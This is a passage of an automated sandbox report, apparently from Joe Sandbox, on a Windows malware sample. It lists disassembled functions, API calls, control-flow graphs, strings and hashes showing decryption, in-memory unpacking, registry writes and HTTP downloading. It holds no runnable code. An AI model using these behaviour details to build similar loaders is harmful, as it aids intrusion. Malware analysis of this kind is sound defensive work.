                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                      • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                      Strings
                                                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                      • API String ID: 3642901890-63410773
                                                      • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                      • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                      • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                      • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55
                                                      Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 921 402950-402967 922 4029a9-4029bd call 408ec2 921->922 923 402969-402972 921->923 924 402974-402979 923->924 925 4029be-402a00 VirtualProtect 923->925 924->922 928 40297b-402980 924->928 925->922 927 402a02-402a24 GetLastError FormatMessageA 925->927 930 402a27-402a2c 927->930 931 402982-40298a 928->931 932 402996-4029a3 call 402c10 928->932 930->930 933 402a2e-402a7a LocalAlloc call 4028e0 OutputDebugStringA LocalFree * 2 call 408ec2 930->933 931->932 934 40298c-402994 931->934 937 4029a5 932->937 934->932 936 4029a8 934->936 936->922 937->936
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                      • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                      • LocalFree.KERNEL32(?), ref: 00402A67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                      • String ID: %s: %s$Error protecting memory page
                                                      • API String ID: 839691724-1484484497
                                                      • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                      • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                      • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                      • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88
                                                      Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298networkfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1026 401880-401943 InternetSetFilePointer InternetReadFile 1028 40197d-4019c0 call 40aa10 HttpQueryInfoA 1026->1028 1032 401d25-401d53 call 408ec2 1028->1032 1033 4019c6-4019f9 CoCreateInstance 1028->1033 1033->1032 1035 4019ff-401a06 1033->1035 1035->1032 1037 401a0c-401a3a 1035->1037 1038 401a40-401a45 1037->1038 1038->1038 1039 401a47-401b08 call 402470 MultiByteToWideChar call 409035 MultiByteToWideChar 1038->1039 1044 401b10-401b19 1039->1044 1044->1044 1045 401b1b-401bd9 call 402310 call 408ed0 1044->1045 1052 401c0a-401c0c 1045->1052 1053 401bdb-401bea 1045->1053 1056 401c12-401c19 1052->1056 1057 401d19-401d20 1052->1057 1054 401c00-401c07 call 409027 1053->1054 1055 401bec-401bfa 1053->1055 1054->1052 1055->1054 1058 401d56-401d5b call 40c26f 1055->1058 1056->1057 1060 401c1f-401c93 call 409035 1056->1060 1057->1032 1067 401c95-401ca3 1060->1067 1068 401cff-401d15 call 408ed0 1060->1068 1070 401ca5-401cdb call 409035 call 4014b0 call 408ed0 1067->1070 1071 401cdd 1067->1071 1068->1057 1074 401ce0-401cfc call 4014b0 1070->1074 1071->1074 1074->1068
                                                      APIs
                                                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: FileInternet$PointerRead
                                                      • String ID: text
                                                      • API String ID: 3197321146-999008199
                                                      • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                      • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                      • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                      • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54
                                                      Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                      • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF36
                                                      • ExitProcess.KERNEL32 ref: 0040EF48
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                      • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                      • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                      • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                                      Function 00CFB4C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00CFB4EE
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00CFB50E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_cfa000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: 4a8b77373c3ad4e51d594ff0f4a7a6dc7e7dd40399445ca78da1af8bc55fa7e4
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: 30F0C2312003196BD7603BB4DC8CABE76E8FF48325F100128F753910C0CB74ED458A62
                                                      Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: emp$mixtwo
                                                      • API String ID: 3472027048-2390925073
                                                      • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                      • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                      • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                      • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA
                                                      Function 004055C0 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1092sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 129 4055c0-405667 call 40f20b call 40f042 Sleep call 402470 call 4038c0 138 405691-4056d2 call 402470 call 4038c0 129->138 139 405669-405675 129->139 151 405701-40570b 138->151 152 4056d4-4056e0 138->152 140 405687-40568e call 409027 139->140 141 405677-405685 139->141 140->138 141->140 143 4056f2 call 40c26f 141->143 150 4056f7-4056fe call 409027 143->150 150->151 154 405718-40571e 151->154 155 40570d-405716 151->155 152->150 156 4056e2-4056f0 152->156 158 405721-405723 154->158 155->158 156->143 156->150 159 405725-40572d 158->159 160 40574d-40576c call 408690 158->160 161 405730-405748 call 40f158 159->161 166 405a91-405ad8 call 408470 * 3 call 4064d0 call 408190 call 4022d0 call 408260 call 402200 160->166 167 405772-40580b call 40aa10 call 409035 call 40aa10 160->167 168 40574a 161->168 217 405bab-405bd6 call 406770 call 408150 call 4022d0 call 408260 call 402200 166->217 218 405ade-405aef call 4021b0 166->218 181 40580d-405821 call 409170 167->181 182 40584f-405856 167->182 168->160 181->182 191 405823-40584c call 409482 call 409126 181->191 186 405882-4058a0 182->186 187 405858-40587d 182->187 190 4058a3-4058a8 186->190 187->186 190->190 193 4058aa-405922 call 402470 call 408a60 190->193 191->182 206 405951-405969 193->206 207 405924-405930 193->207 211 405970-40598d 206->211 209 405932-405940 207->209 210 405947-40594e call 409027 207->210 209->210 213 405942 call 40c26f 209->213 210->206 215 4059a2-4059b0 call 401d60 211->215 216 40598f-405998 call 408ed0 211->216 213->210 231 405a45-405a4c Sleep 215->231 232 4059b6-4059dc 215->232 216->215 274 405caa-405cd5 call 406b10 call 408150 call 4022d0 call 408260 call 402200 217->274 275 405bdc-405c53 call 4067f0 call 408150 call 4022d0 call 402250 call 402200 call 406870 call 408170 call 4022d0 call 402250 call 402200 call 4068f0 call 4081b0 call 4022d0 call 408260 call 402200 217->275 229 405af1-405b49 call 406550 call 4081b0 call 4022d0 call 402250 call 402200 call 4065e0 call 408170 call 4022d0 call 402250 call 402200 call 408440 218->229 230 405b4e-405ba6 call 406660 call 4081b0 call 4022d0 call 402250 call 402200 call 4066f0 call 408170 call 4022d0 call 402250 call 402200 call 408440 218->230 344 406123-40627a call 4016b0 call 407c30 call 4081b0 call 4022d0 call 407bb0 call 408190 call 4022d0 call 407b10 call 4081e0 call 4022d0 call 408560 call 4085c0 call 408670 call 4085c0 call 408670 call 4085c0 call 402200 * 8 229->344 230->344 231->211 235 4059e0-4059e5 232->235 235->235 239 4059e7-405a0c call 402470 235->239 251 405a51-405a56 239->251 252 405a0e-405a11 239->252 255 405a58-405a5a 251->255 256 405a5c-405a5e 251->256 258 405a13-405a1a 252->258 259 405a6a-405a8c call 408440 call 402200 * 2 call 401710 252->259 263 405a61-405a63 255->263 256->263 258->231 266 405a1c-405a25 258->266 259->166 263->259 269 405a65 call 4037d0 263->269 272 405a27-405a35 266->272 273 405a3b-405a42 call 409027 266->273 269->259 272->143 272->273 273->231 326 405d99-405dc4 call 406eb0 call 408130 call 4022d0 call 408260 call 402200 274->326 327 405cdb-405d52 call 406b90 call 408150 call 4022d0 call 402250 call 402200 call 406c10 call 408170 call 4022d0 call 402250 call 402200 call 406c90 call 4081b0 call 4022d0 call 408260 call 402200 274->327 418 405c72-405c9d call 406a00 call 4081b0 call 4022d0 call 408260 call 402200 275->418 419 405c55 call 406980 275->419 374 405dca-405e67 call 406f30 call 408190 call 4022d0 call 402250 call 402200 call 406fb0 call 408170 call 4022d0 call 402250 call 402200 call 407030 call 408130 call 4022d0 call 402250 call 402200 call 4070b0 call 408230 call 4022d0 call 408260 call 402200 326->374 375 405eae-405ed9 call 4072d0 call 408100 call 4022d0 call 408260 call 402200 326->375 494 405d54-405d59 call 406d20 327->494 495 405d5e-405d89 call 406da0 call 4081b0 call 4022d0 call 408260 call 402200 327->495 632 406280-406299 call 4021f0 call 402070 344->632 628 405e73-405e9e call 4071c0 call 408230 call 4022d0 call 408260 call 402200 374->628 629 405e69-405e6e call 407140 374->629 434 405f59-405f84 call 4074f0 call 4081b0 call 4022d0 call 408260 call 402200 375->434 435 405edb-405f54 call 407360 call 408170 call 4022d0 call 402250 call 402200 call 4073e0 call 4081b0 call 4022d0 call 402250 call 402200 call 407470 call 408130 call 4022d0 call 402250 call 402200 375->435 418->344 497 405ca3-405ca8 call 406a90 418->497 433 405c5a-405c6d call 408190 call 4022d0 419->433 464 406115-40611e call 402250 call 402200 433->464 506 406004-40602f call 407700 call 408200 call 4022d0 call 408260 call 402200 434->506 507 405f86-405fff call 407580 call 408170 call 4022d0 call 402250 call 402200 call 407600 call 408190 call 4022d0 call 402250 call 402200 call 407680 call 408130 call 4022d0 call 402250 call 402200 434->507 435->344 464->344 494->433 495->344 565 405d8f-405d94 call 406e30 495->565 497->433 574 406031-406082 call 407790 call 408170 call 4022d0 call 402250 call 402200 call 407810 call 408130 call 4022d0 call 402250 call 402200 call 407890 506->574 575 406084-4060af call 407910 call 408130 call 4022d0 call 408260 call 402200 506->575 507->344 565->326 703 406102-406112 call 408130 call 4022d0 574->703 575->344 642 4060b1-4060fd call 407990 call 408170 call 4022d0 call 402250 call 402200 call 407a10 call 408190 call 4022d0 call 402250 call 402200 call 407a90 575->642 628->344 687 405ea4-405ea9 call 407250 628->687 629->628 659 4062d9-4062e0 Sleep 632->659 660 40629b-4062be call 4020b0 call 4022d0 call 4025c0 632->660 642->703 659->632 695 4062c0-4062cf call 4025c0 660->695 696 4062e2-406341 call 402200 call 408490 * 3 call 404ac0 660->696 687->375 695->696 706 4062d1-4062d4 call 402200 695->706 727 406343-406352 call 408490 call 403940 696->727 728 40635a-406385 call 407cc0 call 408200 call 4022d0 call 408260 call 402200 696->728 703->464 706->659 736 406357 727->736 744 406420-406451 call 407e30 call 4081b0 call 4022d0 call 408260 call 402200 728->744 745 40638b-4063bb call 4016b0 call 407d50 call 4080b0 call 4022d0 728->745 736->728 766 406453-4064b8 call 407fa0 call 408190 call 4022d0 call 407f20 call 408190 call 4022d0 call 407ec0 call 408090 call 4022d0 call 405460 744->766 767 4064bb-4064c0 call 4037d0 744->767 763 4063c0-4063d6 call 4021f0 call 402070 745->763 776 4063e7-406404 call 4020b0 call 4022d0 call 402200 763->776 777 4063d8-4063e3 Sleep 763->777 766->767 781 406409-40641b call 402200 call 401710 776->781 777->763 780 4063e5 777->780 780->781 781->744
                                                      APIs
                                                      • Sleep.KERNEL32(000005DC,?,7732D120), ref: 00405620
                                                      • __Init_thread_footer.LIBCMT ref: 00405847
                                                      • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                        • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                        • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                        • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                        • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                        • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                      • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                      • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                        • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                        • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                        • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                        • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                        • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                        • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                        • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                      • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                      • API String ID: 2078494684-1136066708
                                                      • Opcode ID: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                      • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                      • Opcode Fuzzy Hash: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                      • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9
                                                      Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                      • __cftof.LIBCMT ref: 10001624
                                                      • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                      • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                      • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                      • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                      • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                      • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                      • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                      • String ID: GET$http://
                                                      • API String ID: 1233269984-1632879366
                                                      • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                      • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                      • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                      • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                                      Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                        • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                      Strings
                                                      • GET, xrefs: 00401F81
                                                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                      • text, xrefs: 00401B5C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                      • API String ID: 2146599340-3782612381
                                                      • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                      • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                      • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                      • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5
                                                      Function 04B1003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 942 4b1003c-4b10047 943 4b10049 942->943 944 4b1004c-4b10263 call 4b10a3f call 4b10e0f call 4b10d90 VirtualAlloc 942->944 943->944 959 4b10265-4b10289 call 4b10a69 944->959 960 4b1028b-4b10292 944->960 964 4b102ce-4b103c2 VirtualProtect call 4b10cce call 4b10ce7 959->964 961 4b102a1-4b102b0 960->961 963 4b102b2-4b102cc 961->963 961->964 963->961 971 4b103d1-4b103e0 964->971 972 4b103e2-4b10437 call 4b10ce7 971->972 973 4b10439-4b104b8 VirtualFree 971->973 972->971 975 4b105f4-4b105fe 973->975 976 4b104be-4b104cd 973->976 977 4b10604-4b1060d 975->977 978 4b1077f-4b10789 975->978 980 4b104d3-4b104dd 976->980 977->978 982 4b10613-4b10637 977->982 984 4b107a6-4b107b0 978->984 985 4b1078b-4b107a3 978->985 980->975 981 4b104e3-4b10505 LoadLibraryA 980->981 986 4b10517-4b10520 981->986 987 4b10507-4b10515 981->987 990 4b1063e-4b10648 982->990 988 4b107b6-4b107cb 984->988 989 4b1086e-4b108be LoadLibraryA 984->989 985->984 991 4b10526-4b10547 986->991 987->991 992 4b107d2-4b107d5 988->992 998 4b108c7-4b108f9 989->998 990->978 993 4b1064e-4b1065a 990->993 996 4b1054d-4b10550 991->996 994 4b10824-4b10833 992->994 995 4b107d7-4b107e0 992->995 993->978 997 4b10660-4b1066a 993->997 1006 4b10839-4b1083c 994->1006 1001 4b107e2 995->1001 1002 4b107e4-4b10822 995->1002 1003 4b105e0-4b105ef 996->1003 1004 4b10556-4b1056b 996->1004 1005 4b1067a-4b10689 997->1005 999 4b10902-4b1091d 998->999 1000 4b108fb-4b10901 998->1000 1000->999 1001->994 1002->992 1003->980 1007 4b1056d 1004->1007 1008 4b1056f-4b1057a 1004->1008 1009 4b10750-4b1077a 1005->1009 1010 4b1068f-4b106b2 1005->1010 1006->989 1011 4b1083e-4b10847 1006->1011 1007->1003 1013 4b1059b-4b105bb 1008->1013 1014 4b1057c-4b10599 1008->1014 1009->990 1015 4b106b4-4b106ed 1010->1015 1016 4b106ef-4b106fc 1010->1016 1017 4b10849 1011->1017 1018 4b1084b-4b1086c 1011->1018 1025 4b105bd-4b105db 1013->1025 1014->1025 1015->1016 1019 4b1074b 1016->1019 1020 4b106fe-4b10748 1016->1020 1017->989 1018->1006 1019->1005 1020->1019 1025->996
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B1024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 00012e469dc43d353b972bf543be0b4cd4645ef1b1aa83a42706199b93df6080
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 3E527A74A01229DFDB64CF58C984BACBBB1BF09304F5480D9E94DAB761DB30AA85DF14
                                                      Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1082 10001175-100011a6 call 1000e8e7 1085 100011a8-100011bd call 1000270d 1082->1085 1086 100011bf 1082->1086 1087 100011c5-100011dd InternetSetFilePointer 1085->1087 1086->1087 1089 100011e3-1000121b InternetReadFile 1087->1089 1091 10001253-1000125a 1089->1091 1092 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1089->1092 1094 10001260-100012a0 call 10003c40 HttpQueryInfoA 1091->1094 1095 1000125c-1000125e 1091->1095 1092->1091 1101 100012a6-100012d2 CoCreateInstance 1094->1101 1102 1000150a-10001520 call 1000e8a5 1094->1102 1095->1089 1095->1094 1101->1102 1103 100012d8-100012df 1101->1103 1103->1102 1106 100012e5-10001316 call 1000184b call 10001006 1103->1106 1113 10001318 1106->1113 1114 1000131a-10001351 call 10001c08 call 10001bb9 1106->1114 1113->1114 1120 10001357-1000135e 1114->1120 1121 100014fe-10001505 1114->1121 1120->1121 1122 10001364-100013cc call 1000270d 1120->1122 1121->1102 1126 100013d2-100013e8 1122->1126 1127 100014e6-100014f9 call 10002724 1122->1127 1128 10001486-10001497 1126->1128 1129 100013ee-1000141d call 1000270d 1126->1129 1127->1121 1132 10001499-1000149b 1128->1132 1133 100014dc-100014e4 1128->1133 1140 1000146e-10001483 call 10002724 1129->1140 1141 1000141f-10001421 1129->1141 1136 100014aa-100014ac 1132->1136 1137 1000149d-100014a8 